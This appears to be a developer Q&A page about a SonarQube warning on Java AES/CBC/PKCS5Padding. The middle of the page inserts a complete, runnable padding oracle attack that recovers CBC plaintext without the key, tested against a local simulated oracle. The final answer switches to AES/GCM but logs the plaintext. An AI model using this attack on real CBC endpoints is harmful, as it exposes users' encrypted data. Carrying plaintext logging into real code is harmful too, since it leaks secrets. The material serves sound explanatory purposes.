Hello, currently I have to do an AES encryption and send it to an external SW, but I am having trouble with SonarQube.
This is the relevant part of my current code:
```java
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.xml.bind.DatatypeConverter;
import org.apache.commons.codec.binary.Hex;
import org.apache.commons.lang3.ArrayUtils;

// afegir0Multiple8 pads the input up to a multiple of 8 (helper kept from the old TripleDES code)
String encriptedPad = afegir0Multiple8(Hex.encodeHexString(encriptar.getBytes()));
String cadenaAmb0 = afegir0Multiple8(encriptar);   // Build a string with the length we need
byte[] cadenaRes = cadenaAmb0.getBytes();          // Resulting string to encrypt

// Key: the 16-byte hex key is extended with its first 8 bytes, a leftover from the
// two-key TripleDES layout (K1 K2 K1); with AES this yields a 24-byte (AES-192) key
byte[] hexclaub = DatatypeConverter.parseHexBinary(claveCifradoRedsa);
SecretKeySpec key = new SecretKeySpec(ArrayUtils.addAll(hexclaub, ArrayUtils.subarray(hexclaub, 0, 8)), "AES");

// Init vector
String v = vectorInicial;
IvParameterSpec ivectorSpecv = new IvParameterSpec(v.getBytes("UTF-8"));

// Encrypt
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
cipher.init(Cipher.ENCRYPT_MODE, key, ivectorSpecv);
byte[] encrypted = cipher.doFinal(cadenaRes);
```
It's a little spaghetti because it's recycled from old code (TripleDES), sorry for that. But we can get the gist of it: we are using an AES configuration with AES/CBC/PKCS5PADDING.
The thing is that our SonarQube is giving this output when I submit this code:
Could someone explain to me a little about padding oracle attacks and whether there is some impact in using the instance recommended by Sonar? I am quite lost with encryption.
PS: The SW has agreed to change the configuration, but I would like to understand why I have to use one specific configuration over others.
Thanks
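The padding oracle attack the question asks about, run against the AES/CBC/PKCS5Padding configuration from the post. This is an added example, not code from the question or the answer. The key, IV and sample message are generated or constructed inside the program, and the names `paddingOracle`, `recoverBlock` and `recoverAll` are chosen here. The "server" only reveals whether decryption produced valid padding, which is exactly what a `BadPaddingException` leaking into an error response or a timing difference gives a real attacker; with that one bit the attacker recovers the plaintext without ever learning the key.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class PaddingOracleDemo {
    private static final String TRANSFORM = "AES/CBC/PKCS5Padding";
    private static final SecretKeySpec KEY;   // known to the "server" only, never to the attacker code below
    static {
        byte[] k = new byte[16];
        new SecureRandom().nextBytes(k);
        KEY = new SecretKeySpec(k, "AES");
    }

    // The server side: decrypts one or more blocks and reveals only whether the padding was valid.
    static boolean paddingOracle(byte[] iv, byte[] ct) {
        try {
            Cipher c = Cipher.getInstance(TRANSFORM);
            c.init(Cipher.DECRYPT_MODE, KEY, new IvParameterSpec(iv));
            c.doFinal(ct);
            return true;
        } catch (BadPaddingException e) {
            return false;                          // this single bit is the whole leak
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    // Attacker side: recovers the plaintext of `block` given the block that precedes it in CBC.
    // CBC decryption computes P = D_K(block) XOR prev, so we feed a forged "prev" and ask the oracle
    // until the last byte(s) of D_K(block) XOR forged form valid PKCS#5 padding.
    static byte[] recoverBlock(byte[] prev, byte[] block) {
        byte[] inter = new byte[16];               // D_K(block), recovered byte by byte from the end
        byte[] forged = new byte[16];
        for (int pos = 15; pos >= 0; pos--) {
            int pad = 16 - pos;                    // padding value we want to produce in bytes pos..15
            for (int j = pos + 1; j < 16; j++) forged[j] = (byte) (inter[j] ^ pad);
            int found = -1;
            for (int g = 0; g < 256 && found < 0; g++) {
                forged[pos] = (byte) g;
                if (!paddingOracle(forged, block)) continue;
                if (pos == 15) {
                    // A guess on the last byte may succeed by accident (e.g. it produced "02 02").
                    // Genuine "01" padding must survive a change to the byte before it.
                    forged[14] ^= 0xFF;
                    boolean genuine = paddingOracle(forged, block);
                    forged[14] ^= 0xFF;
                    if (!genuine) continue;
                }
                found = g;
            }
            if (found < 0) throw new IllegalStateException("no valid padding found at byte " + pos);
            inter[pos] = (byte) (found ^ pad);
        }
        byte[] plain = new byte[16];
        for (int j = 0; j < 16; j++) plain[j] = (byte) (inter[j] ^ prev[j]);
        return plain;
    }

    // Walks the whole ciphertext block by block; at most 256 oracle queries per byte.
    static byte[] recoverAll(byte[] iv, byte[] ct) {
        byte[] out = new byte[ct.length];
        byte[] prev = iv;
        for (int b = 0; b < ct.length / 16; b++) {
            byte[] block = Arrays.copyOfRange(ct, b * 16, b * 16 + 16);
            System.arraycopy(recoverBlock(prev, block), 0, out, b * 16, 16);
            prev = block;
        }
        int padLen = out[out.length - 1] & 0xFF;   // strip the PKCS#5 padding we just recovered
        return Arrays.copyOf(out, out.length - padLen);
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample message; the attacker sees only iv and ct, exactly as on the wire.
        byte[] iv = new byte[16];
        new SecureRandom().nextBytes(iv);
        Cipher c = Cipher.getInstance(TRANSFORM);
        c.init(Cipher.ENCRYPT_MODE, KEY, new IvParameterSpec(iv));
        byte[] ct = c.doFinal("card=4111 1111 1111 1111;amt=100".getBytes(StandardCharsets.UTF_8));

        String recovered = new String(recoverAll(iv, ct), StandardCharsets.UTF_8);
        System.out.println("recovered without the key: " + recovered);
    }
}
```

The attack works against the mode, not against AES: any CBC endpoint that behaves differently for bad padding than for a bad message (a distinct error, an exception in a log that reaches the client, or a measurable timing difference) is exploitable in this way, and the same forged-IV trick also lets an attacker flip chosen plaintext bits without detection. That is why Sonar flags AES/CBC/PKCS5Padding and points to an authenticated mode: with AES/GCM the tag check fails before any padding or plaintext is ever examined.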
Answer
Well, the question is already solved thanks to @Topaco in the comments below. I will update my code here in order to mark this question as answered.
My current code looks like this:
```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;

// `log` is the enclosing class's logger; `instance` holds the transformation Sonar recommends
// (assumed to be the GCM transformation, since a GCMParameterSpec is used below)
private static final String instance = "AES/GCM/NoPadding";

@Override
public Map execute(Map in) throws Exception {
    log.info("********** AES ENCRYPTION ACTION ****************");
    Map resultado = new HashMap();
    resultado.put("clave", encriptarAES((String) in.get("encriptar"),
                                        (String) in.get("claveCifrado"),
                                        (String) in.get("vectorInicial")));
    return resultado;
}

private String encriptarAES(String encriptar, String claveCifradoRedsa, String vectorInicial) throws Exception {
    // The key string must be exactly 16, 24 or 32 bytes once encoded
    SecretKey key = new SecretKeySpec(claveCifradoRedsa.getBytes(StandardCharsets.UTF_8), "AES");

    // Encrypt: 128-bit tag; the IV must never be reused with the same key (12 bytes is the GCM recommended size)
    GCMParameterSpec ivParameterSpec = new GCMParameterSpec(128, vectorInicial.getBytes(StandardCharsets.UTF_8));
    Cipher cipher = Cipher.getInstance(instance);
    cipher.init(Cipher.ENCRYPT_MODE, key, ivParameterSpec);
    byte[] encrypted = cipher.doFinal(encriptar.getBytes(StandardCharsets.UTF_8));   // ciphertext followed by the tag
    String codificado64 = Base64.getUrlEncoder().encodeToString(encrypted);

    log.info(encriptar);       // logs the plaintext: keep only while debugging
    log.info(codificado64);
    log.info("************************ END AES ENCRYPTION ACTION ***********************");
    return codificado64;
}
```
I think it's a pretty clean example of AES encryption; hope it's useful to someone.